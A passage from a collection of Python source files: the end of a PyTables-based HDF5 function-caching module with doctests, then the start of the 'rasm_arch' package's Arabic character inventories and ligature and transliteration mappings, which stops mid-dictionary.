def wrapper(input_): # pylint: disable=C0111
# ignoring the complications of hashing multiple arguments
key = ahash(input_)
if key in self.d[func]:
print "cache: returning cached value"
return self.d[func][key]
else:
output = func(input_)
print "cache: computed", func.__name__, input_, "=>", output
if not self.d[func]:
# If the func-specific nested dict is empty, we know that
# this is the first time func is evaluated. Now we can
# perform initialization that had to be deferred until
# we knew what kind of output func produces.
print "cache: deferred initialization"
self.output_type[func] = type(output) # just an example
self.d[func][key] = output # store value for later retrieval
return output
return wrapper
class HdfcacheException(Exception):
"""Class for :class:`Hdfcache` exceptions."""
pass
class Hdfcache(object):
"""HDF file wrapper with function caching decorator"""
def __init__(self, filename, where="/", filters=pt.Filters(complevel=1),
mode="a", withflagfile=True,
*args, **kwargs):
"""
Constructor for HDF cache object.
Arguments "filename", "filters", "mode" are passed to Tables.openFile().
Argument "where" identifies a parent group for all the function caches.
The boolean argument "withflagfile" says whether to create a flag file
with the extension ".delete_me_to_stop" that indicates that the process
is running. Deleting or renaming that file will raise an exception at a
time when no function is being evaluated, ensuring clean exit and
flushing of buffers.
"""
kwargs["filename"] = filename
kwargs["mode"] = mode
kwargs["filters"] = filters
self._file = None
self.where = where
self.fileargs = args
self.filekwargs = kwargs
self.withflagfile = withflagfile
if withflagfile:
self.flagfilename = filename + ".delete_me_to_stop"
self.incontext = False
@property
def file(self): #@ReservedAssignment
"""
File object for an HDF cache, see Tables.File in PyTables.
The file is created if it doesn't exist, reopened if it has been closed.
"""
if not (self._file and self._file.isopen):
self._file = pt.openFile(*self.fileargs, **self.filekwargs)
log.debug("Opened cache file")
return self._file
def group(self, funcname):
"""Dictionary of HDF parent groups for each function."""
try:
return self.file.getNode(self.where, funcname)
except pt.NoSuchNodeError:
return self.file.createGroup(self.where, funcname, createparents=True)
def __enter__(self):
"""
Enter the context of a with statement, optionally creating flag file.
This doctest tests the flag file functionality. The flag file is
deleted on the first pass through the function, causing an
exception to be raised.
>>> import tempfile, shutil, os
>>> dtemp = tempfile.mkdtemp()
>>> filename = os.path.join(dtemp, 'entertest.h5')
>>> cacher = Hdfcache(filename)
>>> @cacher.cache
... def f(x):
... os.remove(cacher.flagfilename)
... return x
>>> with cacher:
... while True:
... y = f(0)
Traceback (most recent call last):
HdfcacheException: Flag file not found when calling <function f...
"""
if self.withflagfile:
self.incontext = True
open(self.flagfilename, "w").close() # create empty file
return self
def __exit__(self, type_, value, tb):
"""
Exit context of with statement, closing file and removing any flag file.
"""
if self._file and self._file.isopen:
self.file.close()
if self.withflagfile and os.path.exists(self.flagfilename):
self.incontext = False
os.remove(self.flagfilename)
def cache(self, func):
"""
Decorator for function-specific caching of inputs and outputs
This gets called once for each function being decorated, creating a
new scope with HDF node objects specific to the decorated function.
The Group object of the decorated function will currently not survive
after the first with statement, because the File is closed and the
node initialization code is never called again. I'll need to either put
all of the "open if exist else create" stuff in the wrapper below, or
encapsulate that into a separate object, which has to know about both
file (in the scope of the "hdfcache" instance) and
func (in the scope of the "cache" function).
How to tell if a node is closed: _v_isopen
Natural naming will open if required, so just need the group and always
be explicit about group.hash, group.input, group.output.
@todo: make iterator that buffers hashes so we can read many at a time
using table.itersequence, see:
http://wiki.umb.no/CompBio/index.php/HDF5_in_Matlab_and_Python
"""
funcname = func.__name__
group = self.group(funcname) # reopening file if required
self.set_source_attr(group, func)
hashdict = dict(uninitialized=True)
@wraps(func)
def wrapper(input_, *args, **kwargs): # pylint: disable=C0111
if self.withflagfile and self.incontext:
if not os.path.exists(self.flagfilename):
msg = "Flag file not found when calling %s"
raise HdfcacheException(msg % func)
input_ = autoname(input_)
ihash = ahash(input_)
group = self.group(funcname) # reopening file if required
if "uninitialized" in hashdict:
# Load the hash table, creating it if necessary
try:
hash_ = group.hash
log.debug("Reading existing hashes")
# Pitfall: Iterating over the hash Table may return
# objects that are not strings and therefore will never
# match the input hash.
# See http://osdir.com/ml/python.pytables.user/2007-12/msg00002.html
# When iterating over the hash Table to compare hashes,
# the hash value must be extracted from each record.
# Iterating over the hash Table itself yields
# a Row instance with a single field called "_0". Thus:
# [row["_0"] for row in hash]
# is the desired list of strings.
# [row for row in hash]
# is a list of multiple copies of the last row.
# hash[:] is a 1-d recarray of strings, which iterates to
# tuples, so
# [h for (h,) in hash[:]] is the desired list of strings.
hashdict.update((h, i) for i, (h,) in enumerate(hash_[:]))
except pt.NoSuchNodeError:
log.debug("Creating hash table for %s", func)
hashdescr = autoname(ihash)[:0]
hashdescr.dtype.names = ["hash"]
hash_ = self.file.createTable(group, "hash", hashdescr)
self.set_source_attr(hash_, ahash)
del hashdict["uninitialized"]
if ihash in hashdict:
log.debug("Cache hit %s: %s %s", func, ihash, input_)
# Prevent ugly "ValueError: 0-d arrays can't be concatenated"
# http://projects.scipy.org/numpy/wiki/ZeroRankArray
return autoname(group.output[hashdict[ihash]])
else:
log.debug("Cache miss %s: %s %s", func, ihash, input_)
timing = np.rec.fromarrays([[0.0], [0.0], [0.0]],
names=["seconds", "start", "end"])
timing.start = time.clock()
output = autoname(func(input_, *args, **kwargs))
timing.end = time.clock()
timing.seconds = timing.end - timing.start
if hashdict: # tables exist, but no record yet for this input
hash_ = group.hash
log.debug("Appending to input, output, and timing tables")
group.input.append(input_)
group.output.append(output)
group.timing.append(timing)
else: # make tables from recarray descriptor, store first record
log.debug("Creating input, output, and timing tables")
self.file.createTable(group, "input", input_)
self.file.createTable(group, "output", output)
self.file.createTable(group, "timing", timing)
hashdict[ihash] = hash_.nrows
hash_.append(autoname(ihash))
return output
# close the file so the decorator doesn't require a "with" statement
self.file.close()
return wrapper
@staticmethod
def set_source_attr(node, obj):
"""Store the source code of an object as an attribute of an HDF node."""
if "sourcecode" not in node._v_attrs:
try:
node._v_attrs.sourcefile = inspect.getfile(obj)
node._v_attrs.sourcecode = inspect.getsource(obj)
except (TypeError, IOError):
node._v_attrs.sourcefile = "built-in"
node._v_attrs.sourcecode = ""
def hdfcat(pathname="*.h5", outfilename="concatenated.h5"):
"""
Concatenate data scattered over many HDF files with equal layout.
All HDF files matching pathname are concatenated into a new file denoted by
outfilename. If the output file already exists, no action is taken. The
function returns True if the output file was created and False otherwise.
A lock is held while concatenating, so that work can be shared between
multiple instances of a script (see the "grabcounter" module), while only
one instance concatenates the results.
Compression settings are inherited from the biggest file.
NOTE: NEED TO ENSURE THAT ALL PROCESSES HAVE FINISHED FLUSHING HDF BUFFERS
BEFORE CONCATENATING. See grabcounter.grabsummer().
The use of iterators conserves memory, so this should work for arbitrarily
large data sets. It is also quite IO-efficient due to PyTables' buffering
of Table objects. The only limitation is perhaps that we need simultaneous
handles to all input files. Also, this currently only concatenates tables,
not arrays. (It might work out of the box, at least for VLArray.)
Todo: Guard against adopting the structure of an unpopulated cache file
left by job instances that arrived too late to do any work. Currently I use
the biggest file and hope that's okay.
Adapted from http://cilit.umb.no/WebSVN/wsvn/Cigene_Repository/CigeneCode/CompBio/cGPsandbox/h5merge.py
The following doctests are more for testing than documentation.
Distribute sample data over three HDF files in a temporary directory.
>>> import tempfile
>>> filename = os.path.join(tempfile.mkdtemp(), 'cachetest.h5')
>>> a = np.rec.fromarrays([[0, 2, 1]], names="a")
>>> b = np.rec.fromarrays([[11, 12, 10]], names="b")
>>> def writedata(i):
... with pt.openFile("%s.%s.h5" % (filename, i), "w") as f:
... f.createTable(f.root, "a", a[i:i+1])
... f.createTable("/group1", "b", b[i:i+1], createparents=True)
... return str(f.root.a[:]) + " " + str(f.root.group1.b[:]) + " " + str(f)
>>> for i in 0, 1, 2:
... print "Part", i, writedata(i)
Part 0 [(0,)] [(11,)] ...cachetest.h5.0.h5...
/ (RootGroup) ''
/a (Table(1,)) ''
/group1 (Group) ''
/group1/b (Table(1,)) ''
Part 1 [(2,)] [(12,)] ...cachetest.h5.1.h5...
/ (RootGroup) ''
/a (Table(1,)) ''
/group1 (Group) ''
/group1/b (Table(1,)) ''
Part 2 [(1,)] [(10,)] ...cachetest.h5.2.h5...
/ (RootGroup) ''
/a (Table(1,)) ''
/group1 (Group) ''
/group1/b (Table(1,)) ''
Part 0 [(0, 11)] ...cachetest.h5.0.h5...
/ (RootGroup) ''
/data (Table(1,)) ''
/group1 (Group) ''
/group1/data (Table(1,)) ''
Part 1 [(2, 12)] ...cachetest.h5.1.h5...
/ (RootGroup) ''
/data (Table(1,)) ''
/group1 (Group) ''
/group1/data (Table(1,)) ''
Part 2 [(1, 10)] ...cachetest.h5.2.h5...
/ (RootGroup) ''
/data (Table(1,)) ''
/group1 (Group) ''
/group1/data (Table(1,)) ''
Concatenate them together. (Note: The output is not sorted.)
>>> hdfcat(filename + ".*.h5", filename + ".concatenated")
True
>>> with pt.openFile(filename + ".concatenated") as f:
... print "Concatenated", str(f)
Concatenated ...cachetest.h5.concatenated...
/ (RootGroup) ''
/a (Table(3,)) ''
/group1 (Group) ''
/group1/b (Table(3,)) ''
>>> with pt.openFile(filename + ".concatenated") as f:
... np.testing.assert_equal(sorted(f.root.a.cols.a), (0, 1, 2))
... np.testing.assert_equal(sorted(f.root.group1.b.cols.b), (10, 11, 12))
False is returned if the output file already exists.
>>> hdfcat(filename + ".*.h5", filename + ".concatenated")
False
"""
try:
with Lock(outfilename + ".lock"):
if os.path.exists(outfilename):
return False
# Find names of all files to be merged, sort by file size.
infilenames = glob(pathname)
infilenames.sort(key=os.path.getsize)
bigfilename = infilenames.pop()
# Open them all safely, using "with nested()"
with nested(*(pt.openFile(i) for i in infilenames)) as fin:
# Copy the biggest HDF file so we can append data
# from the others into the same structure. This relies on
# the biggest file having all the caches populated.
# Don't use pt.copyFile() because it is slow on complex nested
# columns, http://www.pytables.org/trac/ticket/260
shutil.copy(bigfilename, outfilename)
with pt.openFile(outfilename, "a") as fout:
def tablewalkers(f):
"""List of iterators over nodes of HDF files."""
# tables.File.walkNodes is an iterator, here limited to Table's
return [fi.walkNodes(classname="Table") for fi in f]
# Remove HDF files with no actual content.
# Exhaust all the iterators and see which ones end up None.
for t in itertools.izip_longest(*tablewalkers(fin)):
pass
fin = [fi for fi, ti in zip(fin, t) if ti] # pylint: disable=W0631
# izip yields one node per file at a time,
# presumably in identical order.
# (The plus in "[fout] + fin" is list concatenation.)
for t in itertools.izip(*tablewalkers([fout] + fin)):
tout, tin = t[0], t[1:]
for ti in tin:
tout.append(ti[:])
return True
except IOError, exc:
if "Timed out" in str(exc):
return False
else:
raise
if __name__ == "__main__":
import optparse
parser = optparse.OptionParser()
parser.add_option("-o", "--filename", help="Name of output HDF5 file")
parser.add_option("-v", "--verbose", action="store_true",
help="Run doctests with verbose output")
parser.add_option("--debug", action="store_true",
help="Turn on debug logging for HDF cache")
options, _args = parser.parse_args()
if options.debug:
log.setLevel(logging.DEBUG)
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE)
|
PypiClean
|
/rasm_arch-1.2.5-py3-none-any.whl/rasm_arch/rasm_arch.py
|
import re
import sys
try:
import ujson as json
except ImportError:
import json
from io import TextIOBase
from string import whitespace, punctuation
from functools import partial, singledispatch
from importlib.resources import files
from dataclasses import dataclass
from itertools import groupby
from rasm_arch.util import SOURCE, ABJAD_MAPPING, PrivateFileError, pipe
@dataclass
class DATA:
""" Inventory of characters in the Arabic abjad.
"""
Q = 'ٯࢥڧقڨﻕﻖ'
N = 'ںنڻڼڹݧݨݩڽﻥﻦ'
Y = 'ىیۍݷيېۑؠئؽێݵݶࢨࢩؾؿےۓݺݻﻯﻰﮮﮯﯼﯽﻲﮰﮱﺉﺊ'
A = 'ٱأإآاٳٲݳݴٵﺃﺄﺇﺈﺁﺂﺍﺎﭐﭑﴼ'
B = 'ࢬٮبݕࢠٻݐپڀݒٹݖݔتٺټݓثٽٿݑﻧﻨﯾﯿﻳﻴﺋﺌﺏﺐﺑﺒﭖﭗﭘﭙﺕﺖﺗﺘﺙﺚﺛﺜ'
G = 'خحجچݮݼڃڄچڇݘݯځݲڿڂݗࢢڅﺝﺞﺟﺠﺡﺢﺣﺤﺥﺦﺧﺨﭺﭻﭼﭽ'
R = 'رزړݛࢪڔڕڑڒۯݬږڗݫژڙݱﺭﺮﺯﺰﮊﮋ'
D = 'دذڈډڊݚڍڈۮڋݙڌڎڏڐﺩﺪﺫﺬ'
T = 'طظࢣڟﻁﻂﻃﻄﻅﻆﻇﻈ'
C = 'صضڝۻڞﺹﺺﺻﺼﺽﺾﺿﻀ'
S = 'سشڛݽݾښݭݜݰۺڜﺱﺲﺳﺴﺵﺶﺷﺸ'
F = 'فﻑﻒڡڢݠڥݡڣڤڦࢤﻓﻔﻗﻘ'
E = 'عغۼݝݟڠݞﻉﻊﻋﻌﻍﻎﻏﻐ'
W = 'وۄۅࢫؤۆۇۈۉۏݸݹۊۋﻭﻮﺅﺆ'
H = 'هھہەۀۂۿةۃﮤﮥﺓﺔﮦﮧﮨﮩﻪﻫﻬﮪﮫﮬﮭ'
M = 'مݦݥࢧﻡﻢﻣﻤ'
L = 'لݪࢦڸڵڶڷﻝﻞﻟﻠ'
K = 'كکڪګگڰڲڳؼڮݤݢػڱݿڭڴݣﻙﻚﻛﻜﮎﮏﮐﮑﮒﮓﮔﮕ'
CHAR = ''.join((Q, N, Y, A, B, G, R, D, T, C, S, F, E, W, H, M, L, K))
RASM_QNY_MAPPING = {
** {c : 'Q' for c in Q},
** {c : 'N' for c in N},
** {c : 'Y' for c in Y},
}
RASM_MAPPING = {
** {c : 'B' for c in ''.join((N, Y, B))},
** {c : 'G' for c in G},
** {c : 'T' for c in T},
** {c : 'C' for c in C},
** {c : 'S' for c in S},
** {c : 'F' for c in ''.join((Q, F))},
** {c : 'E' for c in E},
** {c : 'H' for c in H},
** {c : 'M' for c in M},
** {c : 'L' for c in L},
** {c : 'K' for c in K},
** {c : 'A' for c in A},
** {c : 'R' for c in R},
** {c : 'D' for c in D},
** {c : 'W' for c in W}
}
NORM_MAPPING = {
'ََ': 'ً',
'ُُ': 'ٌ',
'ِِ': 'ٍ',
}
NORM_REGEX = re.compile('|'.join(NORM_MAPPING))
CLUSTERS = {
"ﯪ" : "ئا",
"ﯫ" : "ئا",
"ﯬ" : "ئە",
"ﯭ" : "ئە",
"ﯮ" : "ئو",
"ﯯ" : "ئو",
"ﯰ" : "ئۇ",
"ﯱ" : "ئۇ",
"ﯲ" : "ئۆ",
"ﯳ" : "ئۆ",
"ﯴ" : "ئۈ",
"ﯵ" : "ئۈ",
"ﯶ" : "ئې",
"ﯷ" : "ئې",
"ﯸ" : "ئې",
"ﯹ" : "ئى",
"ﯺ" : "ئى",
"ﯻ" : "ئى",
"ﰃ" : "ئى",
"ﱨ" : "ئى",
"ﰀ" : "ئج",
"ﲗ" : "ئج",
"ﰁ" : "ئح",
"ﲘ" : "ئح",
"ﰂ" : "ئم",
"ﱦ" : "ئم",
"ﲚ" : "ئم",
"ﳟ" : "ئم",
"ﰄ" : "ئي",
"ﱩ" : "ئي",
"ﰅ" : "بج",
"ﲜ" : "بج",
"ﰆ" : "بح",
"ﲝ" : "بح",
"ﰇ" : "بخ",
"ﲞ" : "بخ",
"ﰈ" : "بم",
"ﱬ" : "بم",
"ﲟ" : "بم",
"ﳡ" : "بم",
"ﰉ" : "بى",
"ﱮ" : "بى",
"ﰊ" : "بي",
"ﱯ" : "بي",
"ﰋ" : "تج",
"ﲡ" : "تج",
"ﰌ" : "تح",
"ﲢ" : "تح",
"ﰍ" : "تخ",
"ﲣ" : "تخ",
"ﰎ" : "تم",
"ﱲ" : "تم",
"ﲤ" : "تم",
"ﳣ" : "تم",
"ﰏ" : "تى",
"ﱴ" : "تى",
"ﰐ" : "تي",
"ﱵ" : "تي",
"ﰑ" : "ثج",
"ﰒ" : "ثم",
"ﱸ" : "ثم",
"ﲦ" : "ثم",
"ﳥ" : "ثم",
"ﰓ" : "ثى",
"ﱺ" : "ثى",
"ﰔ" : "ثي",
"ﱻ" : "ثي",
"ﰕ" : "جح",
"ﲧ" : "جح",
"ﰖ" : "جم",
"ﲨ" : "جم",
"ﰗ" : "حج",
"ﲩ" : "حج",
"ﰘ" : "حم",
"ﲪ" : "حم",
"ﰙ" : "خج",
"ﲫ" : "خج",
"ﰚ" : "خح",
"ﰛ" : "خم",
"ﲬ" : "خم",
"ﰜ" : "سج",
"ﲭ" : "سج",
"ﴴ" : "سج",
"ﰝ" : "سح",
"ﲮ" : "سح",
"ﴵ" : "سح",
"ﰞ" : "سخ",
"ﲯ" : "سخ",
"ﴶ" : "سخ",
"ﰟ" : "سم",
"ﲰ" : "سم",
"ﳧ" : "سم",
"ﰠ" : "صح",
"ﲱ" : "صح",
"ﰡ" : "صم",
"ﲳ" : "صم",
"ﰢ" : "ضج",
"ﲴ" : "ضج",
"ﰣ" : "ضح",
"ﲵ" : "ضح",
"ﰤ" : "ضخ",
"ﲶ" : "ضخ",
"ﰥ" : "ضم",
"ﲷ" : "ضم",
"ﰦ" : "طح",
"ﲸ" : "طح",
"ﰧ" : "طم",
"ﴳ" : "طم",
"ﴺ" : "طم",
"ﰨ" : "ظم",
"ﲹ" : "ظم",
"ﴻ" : "ظم",
"ﰩ" : "عج",
"ﲺ" : "عج",
"ﰪ" : "عم",
"ﲻ" : "عم",
"ﰫ" : "غج",
"ﲼ" : "غج",
"ﰬ" : "غم",
"ﲽ" : "غم",
"ﰭ" : "فج",
"ﲾ" : "فج",
"ﰮ" : "فح",
"ﲿ" : "فح",
"ﰯ" : "فخ",
"ﳀ" : "فخ",
"ﰰ" : "فم",
"ﳁ" : "فم",
"ﰱ" : "فى",
"ﱼ" : "فى",
"ﰲ" : "في",
"ﱽ" : "في",
"ﰳ" : "قح",
"ﳂ" : "قح",
"ﰴ" : "قم",
"ﳃ" : "قم",
"ﰵ" : "قى",
"ﱾ" : "قى",
"ﰶ" : "قي",
"ﱿ" : "قي",
"ﰷ" : "كا",
"ﲀ" : "كا",
"ﰸ" : "كج",
"ﳄ" : "كج",
"ﰹ" : "كح",
"ﳅ" : "كح",
"ﰺ" : "كخ",
"ﳆ" : "كخ",
"ﰻ" : "كل",
"ﲁ" : "كل",
"ﳇ" : "كل",
"ﳫ" : "كل",
"ﰼ" : "كم",
"ﲂ" : "كم",
"ﳈ" : "كم",
"ﳬ" : "كم",
"ﰽ" : "كى",
"ﲃ" : "كى",
"ﰾ" : "كي",
"ﲄ" : "كي",
"ﰿ" : "لج",
"ﳉ" : "لج",
"ﱀ" : "لح",
"ﳊ" : "لح",
"ﱁ" : "لخ",
"ﳋ" : "لخ",
"ﱂ" : "لم",
"ﲅ" : "لم",
"ﳌ" : "لم",
"ﳭ" : "لم",
"ﱃ" : "لى",
"ﲆ" : "لى",
"ﱄ" : "لي",
"ﲇ" : "لي",
"ﱅ" : "مج",
"ﳎ" : "مج",
"ﱆ" : "مح",
"ﳏ" : "مح",
"ﱇ" : "مخ",
"ﳐ" : "مخ",
"ﱈ" : "مم",
"ﲉ" : "مم",
"ﳑ" : "مم",
"ﱉ" : "مى",
"ﱊ" : "مي",
"ﱋ" : "نج",
"ﳒ" : "نج",
"ﱌ" : "نح",
"ﳓ" : "نح",
"ﱍ" : "نخ",
"ﳔ" : "نخ",
"ﱎ" : "نم",
"ﲌ" : "نم",
"ﳕ" : "نم",
"ﳮ" : "نم",
"ﱏ" : "نى",
"ﲎ" : "نى",
"ﱐ" : "ني",
"ﲏ" : "ني",
"ﱑ" : "هج",
"ﳗ" : "هج",
"ﱒ" : "هم",
"ﳘ" : "هم",
"ﱓ" : "هى",
"ﱔ" : "هي",
"ﱕ" : "يج",
"ﳚ" : "يج",
"ﱖ" : "يح",
"ﳛ" : "يح",
"ﱗ" : "يخ",
"ﳜ" : "يخ",
"ﱘ" : "يم",
"ﲓ" : "يم",
"ﳝ" : "يم",
"ﳰ" : "يم",
"ﱙ" : "يى",
"ﲕ" : "يى",
"ﱚ" : "يي",
"ﲖ" : "يي",
"ﱛ" : "ذ",
"ﱜ" : "ر",
"ﱝ" : "ى",
"ﲐ" : "ى",
"ﱤ" : "ئر",
"ﱥ" : "ئز",
"ﱧ" : "ئن",
"ﱪ" : "بر",
"ﱫ" : "بز",
"ﱭ" : "بن",
"ﱰ" : "تر",
"ﱱ" : "تز",
"ﱳ" : "تن",
"ﱶ" : "ثر",
"ﱷ" : "ثز",
"ﱹ" : "ثن",
"ﲈ" : "ما",
"ﲊ" : "نر",
"ﲋ" : "نز",
"ﲍ" : "نن",
"ﲑ" : "ير",
"ﲒ" : "يز",
"ﲔ" : "ين",
"ﲙ" : "ئخ",
"ﲛ" : "ئه",
"ﳠ" : "ئه",
"ﲠ" : "به",
"ﳢ" : "به",
"ﲥ" : "ته",
"ﳤ" : "ته",
"ﲲ" : "صخ",
"ﳍ" : "له",
"ﳖ" : "نه",
"ﳯ" : "نه",
"ﳙ" : "ه",
"ﳞ" : "يه",
"ﳱ" : "يه",
"ﳦ" : "ثه",
"ﳨ" : "سه",
"ﴱ" : "سه",
"ﳩ" : "شم",
"ﴌ" : "شم",
"ﴨ" : "شم",
"ﴰ" : "شم",
"ﳪ" : "شه",
"ﴲ" : "شه",
"ﳵ" : "طى",
"ﴑ" : "طى",
"ﳶ" : "طي",
"ﴒ" : "طي",
"ﳷ" : "عى",
"ﴓ" : "عى",
"ﳸ" : "عي",
"ﴔ" : "عي",
"ﳹ" : "غى",
"ﴕ" : "غى",
"ﳺ" : "غي",
"ﴖ" : "غي",
"ﳻ" : "سى",
"ﴗ" : "سى",
"ﳼ" : "سي",
"ﴘ" : "سي",
"ﳽ" : "شى",
"ﴙ" : "شى",
"ﳾ" : "شي",
"ﴚ" : "شي",
"ﳿ" : "حى",
"ﴛ" : "حى",
"ﴀ" : "حي",
"ﴜ" : "حي",
"ﴁ" : "جى",
"ﴝ" : "جى",
"ﴂ" : "جي",
"ﴞ" : "جي",
"ﴃ" : "خى",
"ﴟ" : "خى",
"ﴄ" : "خي",
"ﴠ" : "خي",
"ﴅ" : "صى",
"ﴡ" : "صى",
"ﴆ" : "صي",
"ﴢ" : "صي",
"ﴇ" : "ضى",
"ﴣ" : "ضى",
"ﴈ" : "ضي",
"ﴤ" : "ضي",
"ﴉ" : "شج",
"ﴥ" : "شج",
"ﴭ" : "شج",
"ﴷ" : "شج",
"ﴊ" : "شح",
"ﴦ" : "شح",
"ﴮ" : "شح",
"ﴸ" : "شح",
"ﴋ" : "شخ",
"ﴧ" : "شخ",
"ﴯ" : "شخ",
"ﴹ" : "شخ",
"ﴍ" : "شر",
"ﴩ" : "شر",
"ﴎ" : "سر",
"ﴪ" : "سر",
"ﴏ" : "صر",
"ﴫ" : "صر",
"ﴐ" : "ضر",
"ﴬ" : "ضر",
"ﵐ" : "تجم",
"ﵑ" : "تحج",
"ﵒ" : "تحج",
"ﵓ" : "تحم",
"ﵔ" : "تخم",
"ﵕ" : "تمج",
"ﵖ" : "تمح",
"ﵗ" : "تمخ",
"ﵘ" : "جمح",
"ﵙ" : "جمح",
"ﵚ" : "حمي",
"ﵛ" : "حمى",
"ﵜ" : "سحج",
"ﵝ" : "سجح",
"ﵞ" : "سجى",
"ﵟ" : "سمح",
"ﵠ" : "سمح",
"ﵡ" : "سمج",
"ﵢ" : "سمم",
"ﵣ" : "سمم",
"ﵤ" : "صحح",
"ﵥ" : "صحح",
"ﵦ" : "صمم",
"ﷅ" : "صمم",
"ﵧ" : "شحم",
"ﵨ" : "شحم",
"ﵩ" : "شجي",
"ﵪ" : "شمخ",
"ﵫ" : "شمخ",
"ﵬ" : "شمم",
"ﵭ" : "شمم",
"ﵮ" : "ضحى",
"ﵯ" : "ضخم",
"ﵰ" : "ضخم",
"ﵱ" : "طمح",
"ﵲ" : "طمح",
"ﵳ" : "طمم",
"ﵴ" : "طمي",
"ﵵ" : "عجم",
"ﷄ" : "عجم",
"ﵶ" : "عمم",
"ﵷ" : "عمم",
"ﵸ" : "عمى",
"ﵹ" : "غمم",
"ﵺ" : "غمي",
"ﵻ" : "غمى",
"ﵼ" : "فخم",
"ﵽ" : "فخم",
"ﵾ" : "قمح",
"ﶴ" : "قمح",
"ﵿ" : "قمم",
"ﶀ" : "لحم",
"ﶵ" : "لحم",
"ﶁ" : "لحي",
"ﶂ" : "لحى",
"ﶃ" : "لجج",
"ﶄ" : "لجج",
"ﶅ" : "لخم",
"ﶆ" : "لخم",
"ﶇ" : "لمح",
"ﶈ" : "لمح",
"ﶉ" : "محج",
"ﶊ" : "محم",
"ﶋ" : "محي",
"ﶌ" : "مجح",
"ﶍ" : "مجم",
"ﶎ" : "مخج",
"ﶏ" : "مخم",
"ﶒ" : "مجخ",
"ﶓ" : "همج",
"ﶔ" : "همم",
"ﶕ" : "نحم",
"ﶖ" : "نحى",
"ﶗ" : "نجم",
"ﶘ" : "نجم",
"ﶙ" : "نجى",
"ﶚ" : "نمي",
"ﶛ" : "نمى",
"ﶜ" : "يمم",
"ﶝ" : "يمم",
"ﶞ" : "بخي",
"ﶟ" : "تجي",
"ﶠ" : "تجى",
"ﶡ" : "تخي",
"ﶢ" : "تخى",
"ﶣ" : "تمي",
"ﶤ" : "تمى",
"ﶥ" : "جمي",
"ﶦ" : "جحى",
"ﶧ" : "جمى",
"ﶨ" : "سخى",
"ﶩ" : "صحي",
"ﶪ" : "شحي",
"ﶫ" : "ضحي",
"ﶬ" : "لجي",
"ﶭ" : "لمي",
"ﶮ" : "يحي",
"ﶯ" : "يجي",
"ﶰ" : "يمي",
"ﶱ" : "ممي",
"ﶲ" : "قمي",
"ﶳ" : "نحي",
"ﶶ" : "عمي",
"ﶷ" : "كمي",
"ﶸ" : "نجح",
"ﶽ" : "نجح",
"ﶹ" : "مخي",
"ﶺ" : "لجم",
"ﶼ" : "لجم",
"ﶻ" : "كمم",
"ﷃ" : "كمم",
"ﶾ" : "جحي",
"ﶿ" : "حجي",
"ﷀ" : "مجي",
"ﷁ" : "فمي",
"ﷂ" : "بحي",
"ﷆ" : "سخي",
"ﷇ" : "نجي",
"ﻵ" : "لآ",
"ﻶ" : "لآ",
"ﻷ" : "لأ",
"ﻸ" : "لأ",
"ﻹ" : "لإ",
"ﻺ" : "لإ",
"ﻻ" : "لا",
"ﻼ" : "لا",
"ﷺ" : "صلى الله عليه وسلم",
"﷽" : "بسم الله الرحمن الرحيم",
"ﷲ" : "الله",
"ﷳ" : "أكبر",
"ﷴ" : "محمد",
"ﷶ" : "رسول",
"ﷷ" : "عليه",
"ﷸ" : "وسلم",
"ﷹ" : "صلى",
"﷼" : "ریال",
"ﷻ" : "جل جلاله",
"ﷱ" : "قلے",
"ﷰ" : "صلے",
"ﷵ" : "صلعم",
}
PALEO_MAPPING = {
'ء' : 'ʔ' ,
'أ' : 'اˀ' ,
'ﺃ' : 'اˀ' ,
'ﺄ' : 'اˀ' ,
'ٲ' : 'اˀ' ,
'ٵ' : 'اˀ' ,
'إ' : 'اɂ' ,
'ﺇ' : 'اɂ' ,
'ﺈ' : 'اɂ' ,
'ٳ' : 'اɂ' ,
'ٱ' : 'اᵟ' ,
'ﭐ' : 'اᵟ' ,
'ﭑ' : 'اᵟ' ,
'آ' : 'ا˜' ,
'آ' : 'ا˜' ,
'ﺁ' : 'ا˜' ,
'ﺂ' : 'ا˜' ,
'ﴼ' : 'اᵃⁿ',
'ݳ' : 'ا۲', # Urdu/Persian encoding of Numerals
'ݴ' : 'ا۳',
'ࢥ' : 'ٯ₁' , # U+08a5 ARABIC LETTER QAF WITH DOT BELOW
'ڧ' : 'ٯ¹' ,
'ق' : 'ٯ²' ,
'ڨ' : 'ٯ³' ,
'ﻕ' : 'ٯ²' ,
'ﻖ' : 'ٯ²' ,
'ن' : 'ں¹' ,
'ڹ' : 'ں₁' ,
'ݧ' : 'ں₂' ,
'ڽ' : 'ں³' ,
'ﻥ' : 'ں¹' ,
'ﻦ' : 'ں¹' ,
'ڻ' : 'ںᵀ' ,
'ڼ' : 'ںₒ' ,
'ݨ' : 'ںᵀ¹' , # we encode from up to bottom
'ݩ' : 'ںᵛ¹' ,
'ي' : 'ی₂' , # U+064a Arabic ya (normalise to Persian ya)
#'ی' : 'ی' , # U+06cc Farsi ya
'ى' : 'ی' , # U+0649 Alif maqsura (normalise to Persian ya)
'ې' : 'ی₂' ,
'ۑ' : 'ی₃' ,
'ؾ' : 'ی²' ,
'ؿ' : 'ی³' ,
'ﻲ' : 'ی₂' ,
'ﮰ' : 'یˀ' ,
'ﮱ' : 'یˀ' ,
'ﺉ' : 'یˀ' ,
'ﺊ' : 'یˀ' ,
'ئ' : 'یˀ' ,
'ۓ' : 'یˀ' ,
'ݷ' : 'ی۴' ,
'ؠ' : 'یₒ' ,
'ؽ' : 'یᶺ' ,
'ێ' : 'یᵛ' ,
'ݵ' : 'ی۲' ,
'ݶ' : 'ی۳' ,
'ݺ' : 'ی۲' ,
'ݻ' : 'ی۳' ,
'ب' : 'ٮ₁' ,
'ٻ' : 'ٮ₂' ,
'ݐ' : 'ٮ₃' ,
'پ' : 'ٮ₃' ,
'ڀ' : 'ٮ₄' ,
'ݒ' : 'ٮ₃' ,
'ݔ' : 'ٮ¹₂' ,
'ت' : 'ٮ²' , # we don't keep a distinction between this and the next
'ٺ' : 'ٮ²' , # (there are other cases like this one)
'ݓ' : 'ٮ²₃' ,
'ث' : 'ٮ³' ,
'ٽ' : 'ٮ³' ,
'ٿ' : 'ٮ⁴' ,
'ݑ' : 'ٮ³₁' ,
'ﻧ' : 'ٮ¹' ,
'ﻨ' : 'ٮ¹' ,
'ﯾ' : 'ٮ₂' ,
'ﯿ' : 'ٮ₂' ,
'ﻳ' : 'ٮ₂' ,
'ﻴ' : 'ٮ₂' ,
'ﺋ' : 'ٮˀ' ,
'ﺌ' : 'ٮˀ' ,
'ﺏ' : 'ٮ₁' ,
'ﺐ' : 'ٮ₁' ,
